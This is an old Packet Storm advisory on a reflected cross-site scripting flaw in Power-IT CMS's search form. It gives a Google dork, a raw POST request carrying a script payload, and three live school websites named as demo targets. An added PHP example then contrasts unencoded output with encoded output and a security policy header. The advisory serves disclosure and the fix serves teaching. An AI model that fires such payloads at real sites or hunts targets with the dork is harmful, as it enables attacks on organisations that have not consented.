Power-IT CMS Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115887
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
`###################################################################################  
  
# Exploit Title: Power-IT Cms Cross Site Scripting Vulnerability  
#  
# Google Dork: intext:"Powered by PowerIT"  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home : http://www.poweritschools.com/  
#  
# Tested on: all  
#  
###################################################################################  
  
======================================  
POST DATA /  
Host: www.ceca-ct.org  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://www.ceca-ct.org/results.php  
Cookie: PHPSESSID=9c2f3ccfeb3a6cf788a60953985f5675  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 26  
  
param=<script>alert(0);</script>&Submit=Search  
Or just go to the search page and put your HTML code in the search input ;)  
D3M0 :   
http://www.ceca-ct.org/results.php  
http://www.seedschooldc.org/results.php  
http://www.njecc.org/results.php  
  
===============Crim3R@Att.Net=========  
$Home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir   
  
`
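
The request above shows the `param` form field being reflected into the results page without encoding. The PHP below is an added example, not Power-IT CMS code or the reporter's: it puts that pattern next to a hardened form, and its function names and markup are hypothetical (only the field names `param` and `Submit` come from the advisory).

```php
<?php
// Added example, not Power-IT CMS source. The field names "param" and
// "Submit" come from the request in the advisory; the function names and
// the markup are hypothetical.

// Pattern that produces the reported behaviour: the search term is
// concatenated into the response without encoding.
function render_heading_unsafe(array $post): string
{
    $term = $post['param'] ?? '';
    return '<h2>Results for: ' . $term . '</h2>';
}

// Hardened form: check the type, bound the length, and encode for the
// HTML context at the point of output.
function render_heading_safe(array $post): string
{
    $term = $post['param'] ?? '';
    if (!is_string($term)) {
        $term = '';               // "param[]=x" arrives as an array
    }
    $term = substr($term, 0, 100);
    // ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE replaces
    // invalid UTF-8 (including a multibyte character cut by substr).
    $encoded = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Results for: ' . $encoded . '</h2>';
}

// Defence in depth when served over HTTP: a policy without 'unsafe-inline'
// keeps injected inline script from running if an encoding call is missed.
if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/html; charset=UTF-8');
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// Constructed sample input: the form fields from the POST body above.
$post = ['param' => '<script>alert(0);</script>', 'Submit' => 'Search'];

echo render_heading_unsafe($post), PHP_EOL; // markup passes through as-is
echo render_heading_safe($post), PHP_EOL;   // markup arrives as text
```

Encoding belongs at every place the search term is written back into a page (heading, input `value` attribute, pagination links), since each is a separate reflection point.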